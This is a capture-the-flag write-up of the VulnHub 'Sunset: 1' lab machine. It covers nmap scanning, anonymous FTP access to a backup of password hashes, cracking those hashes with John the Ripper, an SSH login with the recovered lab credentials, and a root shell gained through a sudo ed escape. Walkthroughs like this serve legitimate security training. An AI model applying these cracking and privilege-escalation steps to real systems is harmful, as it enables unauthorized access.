VULNHUB- Sunset:1

Hello Friends, This writeup is related to VulHub sunset 1 machine, It was very nice box and I enjoyed a lot. Let’s jump right in !

Network Scanning

In the first step of scanning I used the “arp-scan -l” command to perform a Local Network Scan to find out the IP address of the targeted machine.

Command : arp-scan -l

After getting the target machine’s IP address I scanned the target for open port using Nmap.

Command : nmap -A -T4 -p- -oN nmap 192.168.0.175

Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-04 22:59 IST
Nmap scan report for 192.168.0.175
Host is up (0.00013s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     pyftpdlib 1.5.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root         1062 Jul 29  2019 backup
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.0.175:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey: 
|   2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
|   256 35:92:8e:16:43:0c:39:88:8e:83:0d:e2:2c:a4:65:91 (ECDSA)
|_  256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds

From scan result I found that ftp 21 port is open with Anonymous login enabled.

Enumeration / Reconnaissance

Let’s login with username : anonymous and any random password

Command : ftp 192.168.0.175

Here I found one backup file.

I transferred the backup file to my machine

Command : get backup

Now the backup file is transferred to my machine.

Password Cracking

The file contain the SHA512 ($6$) hashes So we can crack them using John The Ripper.

Command : john - -wordlist=/usr/share/wordlists/rockyou.txt

backup - -format=sha512crypt

Here I found the credentials : Username = sunset , Password : cheer14

As ssh port 22 was open so I used these credentials to login.

Command : ssh sunset@192.168.0.175

Wow!! Now I get a remote shell to this target box.

Now, I am a sunset user.

Command : ls

Privilege Escalation

Now I used the “sudo -l” which checks commands we can execute with sudo.

Command : sudo -l

Here I found “/usr/bin/ed” which is the binary.

Then I searched about ed Privilege Escalation found one article.

https://www.hackingarticles.in/linux-for-pentester-ed-privilege-escalation/

Then I searched about ed on GTFOBins and found the exploit there.

https://gtfobins.github.io/gtfobins/ed/

So, I executed “!/bin/bash” command and I was route to root 🙂

Thanks

Happy hacking 🙂